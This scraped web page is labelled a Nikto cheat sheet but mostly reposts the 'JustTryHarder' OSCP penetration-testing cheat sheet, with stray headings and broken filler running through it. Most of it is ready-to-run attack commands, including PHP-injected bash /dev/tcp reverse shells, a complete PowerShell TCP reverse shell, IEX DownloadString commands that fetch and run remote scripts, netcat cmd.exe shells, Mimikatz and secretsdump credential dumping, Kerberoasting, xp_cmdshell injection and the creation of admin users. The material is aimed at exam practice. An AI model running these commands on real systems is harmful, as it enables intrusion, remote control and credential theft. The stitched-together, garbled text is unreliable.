Nikto Cheat Sheet

| 17-08-2021
[RAND-1-100] Comments

Home Instant Answers Nikto Cheat Sheet Next Steps. This is the home page for your Instant Answer and can be. Nmap Nikto Scan. Scans for http (Web) servers on port 80 and pipes into Nikto for scanning. Nmap -p80 10.0.1.0/24 -oG - nikto.pl -h - Scans for http/https servers on port 80 & 443 and pipes into Nikto. To supplement the hacking courses on our Cyber Security Career Development Platform, here is our Hacking Tools Cheat Sheet. PDF download also available. Basic Linux Networking ToolsShow IP configuration:# ip a lwChange IP/MAC address:# ip link set dev eth0 down# macchanger -m 23:05:13:37:42:21 eth0# ip link set dev eth0 upStatic IP address configuration:# ip addr add.

Nikto is a very popular and easy to use webserver assessment tool to find potential problems and vulnerabilities very quickly

# To scan a particular host
nikto -h [host IP/name]

# To scan a host on multiple ports (default = 80)
nikto -h [host IP/name] -port [port number 1], [port number 2], [port number 3]

# To scan a host and output fingerprinted information to a file
nikto -h [host IP/name] -output [output_file]

# To use a proxy while scanning a host
nikto -h [host IP/name] -useproxy [proxy address]

#Display Options -Display

1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors

Sheet

Forked from sinfulz “JustTryHarder” is his “cheat sheet which will aid you through the PWK course & the OSCP Exam.”
So here:“

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Disclaimer: none of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info:I have obtained a lot of this info through other Github repos, blogs, sites and more.I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz

Active Directory & Domain Controllers

  • WIP

BOF (WIP)

(Bad Characters: 0x00, 0x0A)

  • Fuzzing
  • Finding eip position
  • Finding bad chars
  • Locating jmp esp
  • Generating payload with msfvenom
  • Getting reverse shell with netcat

DNS - Zone Transfers

  • host -t axfr HTB.local 10.10.10.10
  • host -l HTB.local 10.10.10.10
  • host -l
  • dig @

    #Base64

    #Certutil

    Kerberoasting

    • GetUserSPNs.py -request -dc-ip <domainuser>
    • powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’);Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
    • impacket-secretsdump -just-dc-ntlm /@ -outputfile filename.hashes

    LFI / RFI

    • _<?phpexec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.10.10/1234 0>&1’”);
    • _<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.0.0.10/1234 0>&1’”);
    • Refer to LFI / RFI section at the top of the page ^^

    MSSQL / SQLi

    • EXEC master..xp_cmdshell ‘whoami’;
    • meh’ exec master..xp_cmdshell ‘whoami’ –
    • https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md
    • http://pentestmonkey.net/category/cheat-sheet/sql-injection

    Password Cracking

    #Hashcat

    • user:$1$AbCdEf123/:16903:0:99999:7:::
    • hashcat -m 500 -a 0 -o cracked_password.txt –force MD5_hash.txt /usr/share/wordlists/rockyou.txt

    #John

    • user:$1$AbCdEf123/:16903:0:99999:7:::
    • john –rules –wordlist=/usr/share/wordlists/rockyou.txt MD5_hash.txt

    Payload Generation

    • https://netsec.ws/?p=331
    • http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/
    • https://www.offensive-security.com/metasploit-unleashed/payloads/
    • https://github.com/swisskyrepo/PayloadsAllTheThings
    • non staged = netcat
    • staged = multi/handler

    PHP

    • https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1

    Priv Esc - Linux

    • https://github.com/SecWiki/linux-kernel-exploits
    • https://gtfobins.github.io
    • https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
    • https://github.com/jondonas/linux-exploit-suggester-2
    • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
    • grep -Ri ‘password’ .
    • find / -perm –4000 2>/dev/null
    • find / -user root -perm -4000 -exec ls -ldb {} ;
    • which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null(then ls -la, look for 777 file permissions).

    Priv Esc - Windows

    • http://www.fuzzysecurity.com/tutorials/16.html
    • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc (PowerUp)
    • https://github.com/M4ximuss/Powerless
    • https://github.com/sagishahar/lpeworkshop
    • https://github.com/411Hall/JAWS
    • https://github.com/rasta-mouse/Watson
    • https://github.com/rasta-mouse/Sherlock (Deprecated)
    • https://github.com/GDSSecurity/Windows-Exploit-Suggester
    • churrasco -d “net user /add '
    • churrasco -d “net localgroup administrators /add'
    • churrasco -d “NET LOCALGROUP “Remote Desktop Users” /ADD'

    Post Exploitation

    1. Mimikatz.exe (run it)
    2. privilege::debug
    3. sekurlsa::logonpasswords

    Port Forwarding

    #Chisel

    Nikto Cheat Sheet

    #Plink

    #SSH

    • ssh root@10.10.10.10 -R 1234:127.0.0.1:1234

    Port Scanning

    #TCP

    Cheat
    • reconnoitre -t 10.10.10.10 -o . –services –quick –hostnames
    • nmap -vvv -sC -sV -p- –min-rate 2000 10.10.10.10
    • nmap -sT -p 22,80,110 -A
    • nmap -p- -iL ips.txt > TCP_Ports.txt

    #UDP (can take hours so maybe netstat is a better alternative)

    • nmap -sU –top-ports 10000
    • nmap -sT -sU -p 22,80,110 -A
    • nmap -sT -sU -p- –min-rate 2000
    • nmap -p- -sU -iL ips.txt > udp.txt
    • nmap -sU -sV -iL ips.txt > alludpports.txt

    #SNMPnmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)

    #SSHnmap –script ssh2-enum-algos -iL ips.txt > SSH.txt

    #SSLnmap -v -v –script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

    PowerShell

    • powershell -ExecutionPolicy ByPass -File script.ps1

    Pivoting

    • sshuttle -r user@10.10.10.10 10.1.1.0/24

    Remote Desktop

    rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/

    Reverse Shells

    #Linux

    • http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    • https://awansec.com/reverse-shell.html

    #Windows

    • https://github.com/Dhayalanb/windows-php-reverse-shell
    • nc [YourIPaddr] [port] –e cmd.exe

    Shell Upgrading

    Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

    SQL Injection (SQLmap)

    • sqlmap -u “http://example.com/test.php?test=test” –level=5 –risk=3 –batch

    Python

    1. python -c ‘import pty;spawn(“/bin/bash”);’or
    2. python3 -c ‘import pty;spawn(“/bin/bash”);’
    3. In reverse shell:```python -c ‘import pty; pty.spawn(“/bin/bash”)’Ctrl-Z
    • In Kali
    1. stty raw -echo
    2. fg
    • In reverse shell
      1. reset (sometimes optional)
      2. export SHELL=bash
      3. export TERM=xterm-256color
      4. stty rows columns (optional)(Sometimes the command will need to be executed: export TERM=xterm)```

    Using socat

    Perl

    1. perl -e ‘exec “/bin/sh”;’
    2. perl: exec “/bin/sh”;

    Bash

    /bin/sh -i

    Nikto Cheat Sheet Excel

    Show listening ports

    • Linux netstat syntax
      1. netstat -tulpngrep LISTEN
    • FreeBSD/MacOS X netstat syntax
      1. netstat -anp tcpgrep LISTEN
      2. netstat -anp udpgrep LISTEN

    • OpenBSD netstat syntax

      1. netstat -na -f inetgrep LISTEN
      2. netstat -natgrep LISTEN
    • Nmap scan syntax
      1. sudo nmap -sT -O localhost
      2. sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
      3. sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##

    SMB - Enumeration

    • https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
    • smbmap -H 10.10.10.10
    • smbclient -L 10.0.0.10
    • smbclient //10.10.10.10/share$

    SMB - Impacket

    • Impacket’s PSEXEC (After creating a remote port fwd)/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10

    Password: (password)

    [*] Trying protocol 445/SMB…

    • Impacket’s SMBServer (For File Transfer)
      1. cd /usr/share/windows-binaries
      2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
      3. 10.10.10.10amimikatz.exe

    Nikto Cheat Sheet Github

    SMTP Enumeration

    https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

    VMware (not going full screen)

    • systemctl restart open-vm-tools.service

    Web Servers:

    • python -m SimpleHTTPServer 80
    • python3 -m http.server 80
    • ngrok http 80

    Web Scanning:

    #Web Scanning with extensions

    #HTTP

    • gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
    • gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

    #HTTPS

    • gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69(in some cases –wildcard will need to be used instead of -k)

    #Nikto

    • nikto -h 10.10.10.10 -p 80

    #Nikto HTTPS

    • nikto -h 10.10.10.10. -p 443

    WFuzz

    • wfuzz -u http://google.com/login.php?username=admin&password=FUZZ -w /usr/share/wordlists/rockyou.txt
    • wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt

    Web Shells

    • https://github.com/Arrexel/phpbash
    • https://github.com/flozz/p0wny-shell

    WordPress

    • https://forum.top-hat-sec.com/index.php?topic=5758.0

    Windows Framework / Powershell

    bypass PowerShell execution policy```PowerShell -Exec Bypass

    powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.1.3.40’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

    echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’) | powershell -noprofile -

    IEX(New-object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’)

    powershell -nop -exec bypass IEX “(New-Object Net.WebClient).DownloadString(‘http://10.10.14.x/Whatever.ps1’); Invoke-Whatever”

    xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/Nishang-ReverseShell.ps1')```Windows Post Exploitation Commands—————-

    • WMIC USERACCOUNT LIST BRIEF
    • net user
    • net localgroup Users
    • net localgroup Administrators
    • net user USERNAME NEWPASS /add
    • net user “USER NAME” NEWPASS /add
    • net localgroup administrators USERNAME /add

    Writeable Directories(Work in progress)—————-

    • C:WindowsSystem32SpoolDriverscolor
    • C:windowstracing
    • C:windowstasks
    • C:windowssystem32microsoftcryptorsamachinekeys
    • To find World Writeable Directories in Linux use the command:find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print